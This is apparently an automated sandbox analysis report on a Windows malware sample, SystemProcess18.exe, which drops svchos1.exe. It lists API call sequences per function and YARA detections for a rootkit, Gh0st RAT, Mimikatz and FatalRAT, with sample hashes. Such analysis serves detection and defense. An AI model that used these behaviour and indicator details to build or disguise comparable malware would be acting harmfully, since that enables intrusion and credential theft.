          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_00740336 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,PtInRect,GetTickCount,ReleaseCapture,29_2_00740336
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006E8934 SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,29_2_006E8934
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_00714D6C GetParent,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,29_2_00714D6C
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006F2E39 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,29_2_006F2E39
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_00740ECC __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,_memset,_free,SendMessageW,GetParent,29_2_00740ECC
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006F0F32 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,29_2_006F0F32
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072D10D GetKeyState,GetKeyState,GetKeyState,GetKeyState,29_2_0072D10D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0075D272 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,29_2_0075D272
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_00745F2B GetKeyState,GetKeyState,GetKeyState,29_2_00745F2B
          Source: conhost.exeProcess created: 67

          System Summary

          barindex
          Source: 28.2.svchos1.exe.36bcd38.5.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.317cd38.5.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.318c380.6.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.358cd04.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.357d6bc.3.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.2a7d6bc.3.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.36cc380.4.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.2a8cd04.4.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
          Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
          Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
          Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
          Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CE680: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,28_2_035CE680
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035D01A0 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,_swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcat,lstrcat,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcat,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess,28_2_035D01A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035D0650 ExitWindowsEx,28_2_035D0650
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CE680 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,28_2_035CE680
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03090650 ExitWindowsEx,29_2_03090650
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0308E680 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,29_2_0308E680
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DF22140_3_03DF2214
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DEC1B40_3_03DEC1B4
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DF1EB40_3_03DF1EB4
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DE1E2C0_3_03DE1E2C
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DE1E2B0_3_03DE1E2B
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DE5D600_3_03DE5D60
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_041AB49010_2_041AB490
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_041AB47010_2_041AB470
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_007FB49019_2_007FB490
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007282DD28_2_007282DD
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007C039C28_2_007C039C
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006DE4C728_2_006DE4C7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007367A828_2_007367A8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B2EA728_2_007B2EA7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0074B05D28_2_0074B05D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072937928_2_00729379
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B580328_2_007B5803
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0351438428_2_03514384
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034FA03428_2_034FA034
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035146B428_2_035146B4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034DC4E428_2_034DC4E4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03484B5428_2_03484B54
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03502B7428_2_03502B74
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034DCB7428_2_034DCB74
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034DA9C428_2_034DA9C4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034AA80428_2_034AA804
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0349AE4428_2_0349AE44
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034DAE7428_2_034DAE74
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03512C0428_2_03512C04
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034FF36428_2_034FF364
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034AB32428_2_034AB324
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034D912428_2_034D9124
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0351501428_2_03515014
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034A502428_2_034A5024
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B7E028_2_0348B7E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034A97E428_2_034A97E4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B7BB28_2_0348B7BB
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034FF61428_2_034FF614
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035156B428_2_035156B4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B94928_2_0348B949
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B90528_2_0348B905
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B92728_2_0348B927
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0350199428_2_03501994
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034B198428_2_034B1984
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B84F28_2_0348B84F
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B87428_2_0348B874
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B80528_2_0348B805
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B82A28_2_0348B82A
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B8E328_2_0348B8E3
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B89928_2_0348B899
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0348B8BE28_2_0348B8BE
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034DBF6428_2_034DBF64
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034FBEA428_2_034FBEA4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03505EA428_2_03505EA4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0365228028_2_03652280
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C41D028_2_035C41D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0361C1F028_2_0361C1F0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_036421F028_2_036421F0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0361A04028_2_0361A040
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035F100028_2_035F1000
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0364101028_2_03641010
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_036187A028_2_036187A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_036396B028_2_036396B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0365469028_2_03654690
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E46A028_2_035E46A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0363B52028_2_0363B520
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0364552028_2_03645520
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0361B5E028_2_0361B5E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CA59028_2_035CA590
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0361A4F028_2_0361A4F0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DA4C028_2_035DA4C0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0361BB6028_2_0361BB60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03653A0028_2_03653A00
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0363E9E028_2_0363E9E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035EA9A028_2_035EA9A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E8E6028_2_035E8E60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E9E8028_2_035E9E80
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03653D3028_2_03653D30
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03654D3028_2_03654D30
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0363EC9028_2_0363EC90
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03A7336928_2_03A73369
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007282DD29_2_007282DD
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007C039C29_2_007C039C
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006DE4C729_2_006DE4C7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007367A829_2_007367A8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007B2EA729_2_007B2EA7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0074B05D29_2_0074B05D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072937929_2_00729379
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007B580329_2_007B5803
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0098840529_2_00988405
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_009887FC29_2_009887FC
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_009952E429_2_009952E4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0098336929_2_00983369
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0099B9A429_2_0099B9A4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0099BD0429_2_0099BD04
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0105556029_2_01055560
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_010435E529_2_010435E5
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_010507C129_2_010507C1
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0104868129_2_01048681
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0105683229_2_01056832
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_01055A3729_2_01055A37
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_01048A7829_2_01048A78
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0104FDFC29_2_0104FDFC
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0105BC2029_2_0105BC20
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0105BF8029_2_0105BF80
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A1438429_2_02A14384
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029AB32429_2_029AB324
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029FF36429_2_029FF364
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029FA03429_2_029FA034
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A1501429_2_02A15014
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029A502429_2_029A5024
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029D912429_2_029D9124
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A156B429_2_02A156B4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A146B429_2_02A146B4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029FF61429_2_029FF614
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B7BB29_2_0298B7BB
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B7E029_2_0298B7E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029A97E429_2_029A97E4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029DC4E429_2_029DC4E4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02984B5429_2_02984B54
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A02B7429_2_02A02B74
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029DCB7429_2_029DCB74
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B89929_2_0298B899
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B8BE29_2_0298B8BE
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B8E329_2_0298B8E3
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B80529_2_0298B805
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029AA80429_2_029AA804
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B82A29_2_0298B82A
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B84F29_2_0298B84F
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B87429_2_0298B874
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029B198429_2_029B1984
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A0199429_2_02A01994
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029DA9C429_2_029DA9C4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B90529_2_0298B905
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B92729_2_0298B927
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0298B94929_2_0298B949
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A05EA429_2_02A05EA4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029FBEA429_2_029FBEA4
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0299AE4429_2_0299AE44
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029DAE7429_2_029DAE74
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029DBF6429_2_029DBF64
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02A12C0429_2_02A12C04
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0311228029_2_03112280
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030841D029_2_030841D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_031021F029_2_031021F0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030DC1F029_2_030DC1F0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0310101029_2_03101010
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030B100029_2_030B1000
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030DA04029_2_030DA040
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030D87A029_2_030D87A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0311469029_2_03114690
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A46A029_2_030A46A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030F96B029_2_030F96B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030FB52029_2_030FB520
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0310552029_2_03105520
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0308A59029_2_0308A590
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030DB5E029_2_030DB5E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0309A4C029_2_0309A4C0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030DA4F029_2_030DA4F0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030DBB6029_2_030DBB60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03113A0029_2_03113A00
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030AA9A029_2_030AA9A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030FE9E029_2_030FE9E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A8E6029_2_030A8E60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A9E8029_2_030A9E80
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03113D3029_2_03113D30
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03114D3029_2_03114D30
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030FEC9029_2_030FEC90
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: String function: 03DE1DE4 appears 34 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 010435A0 appears 44 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 007B20B0 appears 62 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 007B1C38 appears 140 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 007B1C02 appears 48 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 007B1BCF appears 475 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 006BAEAD appears 34 times
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: String function: 00983324 appears 44 times
          Source: SystemProcess18.exe, 00000000.00000000.1226334121.000000000021A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCCCC.exe8 vs SystemProcess18.exe
          Source: SystemProcess18.exe, 00000003.00000000.1266441108.000000000021A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCCCC.exe8 vs SystemProcess18.exe
          Source: SystemProcess18.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 28.2.svchos1.exe.36bcd38.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.317cd38.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.318c380.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.358cd04.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.357d6bc.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.2a7d6bc.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.36cc380.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.2a8cd04.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
